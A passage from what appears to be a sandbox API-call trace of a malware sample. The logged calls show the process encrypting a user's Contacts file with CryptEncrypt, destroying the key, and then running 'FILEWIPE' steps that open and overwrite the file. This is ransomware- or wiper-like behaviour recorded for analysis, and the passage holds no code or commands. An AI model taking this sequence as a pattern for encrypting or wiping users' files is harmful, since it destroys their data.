lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0029.407] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0029.407] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0029.407] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1b70 | out: hHeap=0x770000) returned 1 [0029.407] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da288 | out: hHeap=0x770000) returned 1 [0029.408] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0029.408] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0029.408] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0029.408] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2e8 | out: hHeap=0x770000) returned 1 [0029.408] PeekMessageW (in: lpMsg=0x6ae1c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae1c4) returned 0 [0029.408] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0029.408] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2300 | out: hHeap=0x770000) returned 1 [0029.408] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0029.408] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0029.408] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0029.408] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da288 | out: hHeap=0x770000) returned 1 [0029.408] PeekMessageW (in: lpMsg=0x6ae38c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae38c) returned 0 [0029.408] PeekMessageW (in: lpMsg=0x6ae38c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae38c) returned 0 [0029.408] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0029.408] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0029.408] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0029.408] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0029.408] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0029.408] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0029.408] PeekMessageW (in: lpMsg=0x6ae1d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae1d4) returned 0 [0029.409] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0029.409] CryptEncrypt (in: hKey=0x7c2280, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x6ae220*=0x10b1e, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x6ae220*=0x10b20) returned 1 [0029.409] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0029.409] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0029.410] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0029.410] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0029.410] CharLowerBuffW (in: lpsz="byte[68385]", cchLength=0xb | out: lpsz="byte[68385]") returned 0xb [0029.410] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0029.411] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0029.411] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0029.411] PeekMessageW (in: lpMsg=0x6ae1d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae1d4) returned 0 [0029.411] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0029.411] CryptEncrypt (in: hKey=0x7c2280, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x8e2138*, pdwDataLen=0x6ae220*=0x10b1e, dwBufLen=0x10b20 | out: pbData=0x8e2138*, pdwDataLen=0x6ae220*=0x10b20) returned 1 [0029.412] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0029.412] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0029.412] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0029.412] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0029.412] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0029.412] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0029.412] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0029.412] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0029.412] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0029.412] PeekMessageW (in: lpMsg=0x6ae38c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae38c) returned 0 [0029.412] PeekMessageW (in: lpMsg=0x6ae38c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae38c) returned 0 [0029.412] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0029.412] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0029.413] PeekMessageW (in: lpMsg=0x6ae1c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae1c4) returned 0 [0029.413] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0029.413] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0029.413] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0029.416] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0029.416] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0029.416] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0029.418] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0029.418] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0029.418] CharUpperBuffW (in: lpsz="_CRYPT_DESTROYKEY", cchLength=0x11 | out: lpsz="_CRYPT_DESTROYKEY") returned 0x11 [0029.418] PeekMessageW (in: lpMsg=0x6aea4c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aea4c) returned 0 [0029.418] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0029.419] PeekMessageW (in: lpMsg=0x6ae3fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae3fc) returned 0 [0029.419] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0029.419] CryptDestroyKey (hKey=0x7c2280) returned 1 [0029.419] PeekMessageW (in: lpMsg=0x6aea4c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aea4c) returned 0 [0029.419] PeekMessageW (in: lpMsg=0x6aea4c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aea4c) returned 0 [0029.419] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0029.419] PeekMessageW (in: lpMsg=0x6ae7f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae7f4) returned 0 [0029.419] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0029.419] PeekMessageW (in: lpMsg=0x6ae59c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae59c) returned 0 [0029.419] PeekMessageW (in: lpMsg=0x6ae59c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae59c) returned 0 [0029.419] PeekMessageW (in: lpMsg=0x6ae7f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae7f4) returned 0 [0029.419] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0029.419] PeekMessageW (in: lpMsg=0x6ae3d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae3d4) returned 0 [0029.419] PeekMessageW (in: lpMsg=0x6ae7f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae7f4) returned 0 [0029.420] PeekMessageW (in: lpMsg=0x6ae7f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae7f4) returned 0 [0029.420] PeekMessageW (in: lpMsg=0x6aea4c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aea4c) returned 0 [0029.420] PeekMessageW (in: lpMsg=0x6aea4c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aea4c) returned 0 [0029.420] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0029.420] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0029.420] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0029.420] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0029.420] PeekMessageW (in: lpMsg=0x6ae8bc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae8bc) returned 0 [0029.420] PeekMessageW (in: lpMsg=0x6ae8bc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae8bc) returned 0 [0029.420] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0029.420] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0029.420] PeekMessageW (in: lpMsg=0x6ae6f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae6f4) returned 0 [0029.420] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0029.420] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0029.420] PeekMessageW (in: lpMsg=0x6ae6e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae6e4) returned 0 [0029.420] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0029.421] PeekMessageW (in: lpMsg=0x6ae6e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae6e4) returned 0 [0029.421] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0029.421] CryptReleaseContext (hProv=0x7d5c40, dwFlags=0x0) returned 1 [0029.421] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0029.421] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0029.421] PeekMessageW (in: lpMsg=0x6ae6e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae6e4) returned 0 [0029.421] FreeLibrary (hLibModule=0x754b0000) returned 1 [0029.421] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0029.421] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0029.421] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0029.422] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0029.423] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0029.430] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0029.430] CharUpperBuffW (in: lpsz="FILEWIPE", cchLength=0x8 | out: lpsz="FILEWIPE") returned 0x8 [0029.430] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0029.430] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0029.430] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\Administrator.contact", lpFindFileData=0x6ae7a0 | out: lpFindFileData=0x6ae7a0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x28d4b900, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xf0fefd94, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0x10b1e, dwReserved0=0x0, dwReserved1=0x777648, cFileName="Administrator.contact", cAlternateFileName="ADMINI~1.CON")) returned 0x7c2240 [0029.430] FindClose (in: hFindFile=0x7c2240 | out: hFindFile=0x7c2240) returned 1 [0029.430] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0029.430] CharLowerBuffW (in: lpsz="byte[68382]", cchLength=0xb | out: lpsz="byte[68382]") returned 0xb [0029.431] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0029.431] CharUpperBuffW (in: lpsz="MEMSET", cchLength=0x6 | out: lpsz="MEMSET") returned 0x6 [0029.431] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0029.431] CharLowerBuffW (in: lpsz="ptr:cdecl", cchLength=0x9 | out: lpsz="ptr:cdecl") returned 0x9 [0029.431] LoadLibraryW (lpLibFileName="msvcrt.dll") returned 0x76b40000 [0029.431] FreeLibrary (hLibModule=0x76b40000) returned 1 [0029.431] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0029.431] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0029.431] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0029.431] CharUpperBuffW (in: lpsz="_WINAPI_CREATEFILE", cchLength=0x12 | out: lpsz="_WINAPI_CREATEFILE") returned 0x12 [0029.431] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0029.431] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0029.431] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0029.431] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0029.431] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0029.431] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0029.432] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0029.432] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0029.432] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0029.432] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0029.432] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0029.432] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0029.432] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0029.432] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0029.432] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0029.432] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0029.432] CharLowerBuffW (in: lpsz="handle", cchLength=0x6 | out: lpsz="handle") returned 0x6 [0029.432] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x76e10000 [0029.432] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\Administrator.contact" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\contacts\\administrator.contact"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x128 [0029.433] FreeLibrary (hLibModule=0x76e10000) returned 1 [0029.433] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0029.433] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0029.433] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0029.433] CharUpperBuffW (in: lpsz="_WINAPI_WRITEFILE", cchLength=0x11 | out: lpsz="_WINAPI_WRITEFILE") returned 0x11 [0029.433] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0029.433] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0029.433] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x76e10000 [0029.433] FreeLibrary (hLibModule=0x76e10000) returned 1 [0029.433] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0029.433] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0029.434] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0029.434] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0029.434] CharUpperBuffW (in: lpsz="_WINAPI_CLOSEHANDLE", cchLength=0x13 | out: lpsz="_WINAPI_CLOSEHANDLE") returned 0x13 [0029.434] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0029.434] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0029.434] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x76e10000 [0029.434] FreeLibrary (hLibModule=0x76e10000) returned 1 [0029.434] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0029.434] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0029.434] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0029.434] 